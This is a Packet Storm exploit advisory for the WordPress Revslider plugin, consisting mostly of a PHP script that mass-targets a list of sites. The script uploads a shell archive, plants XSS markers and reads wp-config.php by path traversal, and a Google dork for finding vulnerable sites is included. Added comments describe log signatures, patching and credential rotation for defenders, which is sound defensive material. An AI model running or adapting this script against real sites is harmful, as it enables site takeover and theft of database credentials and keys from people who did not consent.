WordPress Revslider Arbitrary File Upload / Download / XSS

2015-06-23T00:00:00
ID PACKETSTORM:132424
Type packetstorm
Reporter CaFc Versace
Modified 2015-06-23T00:00:00

Description

                                        
                                            `#####################################################################################  
# Exploit Title : WordPress Revslider Arbitrary File Upload, Download & Cross Site Scripting  
# Google Dork : inurl:"/wp-content/plugins/revslider/"  
# Date : 21-06-2015  
# Exploit Author : CaFc Versace  
# Vendor Homepage : http://revolution.themepunch.com/  
# Tested on : Windows 7  
# Contact : cafc.versace[@]surabayablackhat.org; me[@]dwisiswanto.my.id  
#####################################################################################  
  
  
# Exploit & PoC :  
-------------------------------------------------------------------------------------  
<?php  
/** me@dwisiswanto.my.id **/  
  
/******************************************  
First, install PHP CLI  
USAGE: php exploit.php list-of-target.txt  
******************************************/  
  
// Values shared by every probe in the loop below. They are sent verbatim as
// request fields, so they are also the literal strings a defender can search
// for in WAF or request-body logs.
$cafc = array(
"file"=>"revslider.zip", // enter a ur shell file into a zip
// Unclosed HTML tag used as a reflection marker: the script later treats an echoed
// response as a hit. The server-side fix for that class of issue is
// context-aware output encoding of the echoed parameter.
"xss"=>"<marquee>CaFc Versace was Here", // for xss
// "\w" is not an escape sequence in a double-quoted PHP string, so the value is
// sent with a literal backslash. Traversal signatures for the `img` parameter
// should therefore match both `..\` and `../`, not the forward-slash form only.
"kfg"=>"..\wp-config.php" // for download config
);
  
/**
 * Send a single HTTP request with cURL and return the response body.
 *
 * No cookie, credential or custom header is set here, so every request made
 * through this helper reaches the server unauthenticated.
 *
 * @param string $yuerel    Full URL to request.
 * @param mixed  $dataAing  Fields for a POST body. The test is a loose `!= null`,
 *                          so null, an empty array and an empty string all
 *                          leave the request as a GET.
 * @return string|bool Response body, or false when curl_exec() fails.
 */
function hajar($yuerel, $dataAing=null) {
$cuih = curl_init();
curl_setopt($cuih, CURLOPT_URL, $yuerel);
if ($dataAing != null){
curl_setopt($cuih, CURLOPT_POST, true);
// The callers pass a PHP array; cURL encodes an array given to
// CURLOPT_POSTFIELDS as multipart/form-data, which is the Content-Type a
// server-side log or WAF will see for these requests.
curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
}
// Redirects are followed, so the body returned may come from a different URL
// than the one requested.
curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
// Return the body as a string instead of printing it.
curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
// Certificate verification is switched off: the peer's identity is not checked,
// so a response cannot be assumed to come from the named host.
curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
$eks = curl_exec($cuih);
curl_close($cuih);
return $eks;
}
  
// Main loop: read a list of base URLs from the file named in argv[1] and send
// four unauthenticated POSTs to <base>/wp-admin/admin-ajax.php for each one.
//
// Defender notes (what this traffic looks like and what to do about it):
// - All four requests share the same request line, POST /wp-admin/admin-ajax.php.
//   The distinguishing fields travel in the body: action=revslider_ajax_action
//   with client_action=update_plugin or get_captions_css, and
//   action=revslider_show_image with an `img` value that names wp-config.php
//   behind a `..` segment. Access logs that record only the request line will
//   not separate these from ordinary admin-ajax traffic; body-aware logging or
//   a WAF rule on those field values is needed.
// - The verdicts printed below are simple comparisons on the response body or
//   on its decoded `success` / `message` fields. They are heuristics, not proof
//   of exposure or of safety; confirm against the installed plugin version.
// - Remediation: update the plugin to a vendor-fixed release (the fixed version
//   is not stated on this page). NOTE(review): the plugin is often shipped
//   inside themes - check theme-bundled copies as well as the plugins directory.
// - Triage after suspected abuse: look for unexpected files under
//   wp-content/plugins/revslider/temp/update_extract/ and, if wp-config.php may
//   have been disclosed, rotate the database password and the keys/salts it holds.

// "@" suppresses the warning raised when the list file cannot be read.
$site = @file_get_contents($argv[1]);
// One target per line; only CRLF line endings are split.
$tumbal = explode("\r\n", $site);
echo "Calculate the target list : " . count($tumbal);
// NOTE(review): file_get_contents() returns false, not null, on failure, so this
// isset() test does not catch an unreadable list file.
if (!isset($site)) {
echo "Site N/A.";
} else {
foreach ($tumbal as $uri) {
echo "\n------------------------------------";
echo "\nTarget => " . $uri;
echo "\n";
// Probe 1: the plugin's update_plugin client action. "update_file" is sent as
// the plain string from $cafc['file'].
$menta = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => "update_plugin",
"update_file" => $cafc['file'])
);
// json_decode() yields null for a non-JSON body; the loose comparisons below
// then read the missing keys as false.
$jason = json_decode($menta, true);
if ($jason['success'] == false || $jason['message'] == "Wrong request") {
echo "\nExploit [update_plugin] => NOT VULNERABLE";
} else {
echo "\nExploit [update_plugin] => SUCCESS";
// Directory printed here is the one to inspect for unexpected files during triage.
echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n";
}

// Probe 2: the get_captions_css client action with the HTML marker in "data".
$menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => "get_captions_css",
"data" => $cafc['xss'])
);
$jasonB = json_decode($menta2, true);
if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
echo "\nExploit [get_captions_css] => NOT VULNERABLE";
} elseif ($jasonB['success'] == true) {
echo "\nExploit [get_captions_css] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_ajax_action&";
echo "client_action=get_captions_css";
echo "data=" . urlencode($cafc['xss']) . "\n";
}

// Probe 3: the HTML marker is sent as the client_action name itself. A reply
// whose message matches "wrong ajax action" is what the script counts as a hit.
// presumably the action name is echoed back in that error message - confirm
// against the plugin's handler; the fix would be encoding it on output.
$menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => $cafc['xss'])
);
$jasonC = json_decode($menta3, true);
if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
echo "\nExploit [xss] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_ajax_action";
echo "client_action=" . urlencode($cafc['xss']) . "\n";
} else {
echo "\nExploit [xss] => NOT VULNERABLE";
}

// Probe 4: revslider_show_image with a relative path to wp-config.php in "img".
// wp-config.php holds database credentials and auth keys, which is why a
// successful read calls for credential rotation, not just patching.
// The third argument ($uri) is not declared by hajar() and is ignored.
$menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_show_image",
"img" => $cafc['kfg']),
$uri);
// Verdict is a loose comparison of the raw body against two error strings and 0.
if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) {
echo "\nExploit [wp-config] => NOT VULNERABLE\n";
} else {
echo "\nExploit [wp-config] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_show_image";
echo "img=" . $cafc['kfg'] . "\n";
}
}
}
?>  
-------------------------------------------------------------------------------------  
  
  
# Credits :  
-------------------------------------------------------------------------------------  
CaFc Versace  
Thanks : Agency CaFc - Surabaya BlackHat  
-------------------------------------------------------------------------------------  
  
  
./learn to be better  
`